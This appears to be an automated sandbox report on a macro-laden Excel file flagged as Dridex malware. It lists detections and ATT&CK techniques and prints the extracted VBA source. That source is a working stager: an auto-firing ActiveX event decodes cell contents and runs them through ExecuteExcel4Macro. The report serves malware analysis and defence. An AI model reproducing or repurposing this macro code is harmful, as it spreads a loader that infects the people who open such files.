Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate that this OOXML document contains VBA macros that leverage ActiveX events to launch decoded Excel 4.0 macros. ClamAV detections confirm this is likely Ldridex malware. The VBA script contains functions for string manipulation and obfuscation, and the ExecuteExcel4Macro function is used to run the decoded macro, which is a common technique for downloading and executing further stages.
Heuristics (3)

- ClamAV: Xls.Malware.Ldridex-9768648-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Ldridex-9768648-0
- VBA project inside OOXML (medium, OOXML_VBA, 1 related finding): Document contains a VBA project — VBA macros present
- VBA ActiveX event launches decoded Excel4 macro (critical, OLE_VBA_ACTIVEX_XLM_STAGER): VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1751 bytes | 242b0f8b54fd014e3adac835efae51c4f0f735f152287b786cbfc0c2b18d1143 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes | e64bed876cdee0cd382cbfb509de8c57e855e28d637eeac0d7aacfa08d6bc079 |
| emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes | 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5 |

macros.bas: preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "test, 1, 0, MSForms, Frame"
Function mj(a1, a2, a3, a4, y As String)
mj = Replace(y, a1, a2): mj = Replace(mj, a3, a4)
End Function
Function sg()
Dim gt As String, f As Integer
g = 602: gg = 890
AA = Int((gg - g + 1) * Rnd + g)
For j = 1 To 4
If IsEmpty(Cells(AA, j)) = 0 Then
gt = Cells(AA, j)
f = j
Exit For
End If
Next
sg = vo(gt, f)
End Function
Sub deccof()
a = 9
End Sub
Function vo(aw As String, w As Integer) As String
Dim ww() As Byte
ww = StrConv(aw, vbFromUnicode)
For Each Q In ww
vo = vo & Chr(Q + w)
Next
End Function
Function SW(Length As Long) As Variant
Dim d As Long
For d = 1 To Length
SW = SW & [MID("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",RANDBETWEEN(1,62),1)]
Next
End Function
Private Sub test_Layout()
Dim hh As String
kk = SW(Int((8 - 6 + 1) * Rnd + 6))
d2 = SW(Int((8 - 6 + 1) * Rnd + 6))
d3 = SW(Int((8 - 6 + 1) * Rnd + 6))
For j = 223 To 227
Do
nm = vo(Cells(j, 1), Int((4 - 1 + 1) * Rnd + 1))
Loop Until Right(nm, 1) = ")"
hh = nm
ExecuteExcel4Macro (mj("$", d3, "X", sg, mj(";", kk, "'", d2, hh)))
nm = ""
Next
End Sub

vbaProject_00.bin: detection

- ClamAV: Xls.Malware.Ldridex-9768648-0
- Obfuscation or payload: unlikely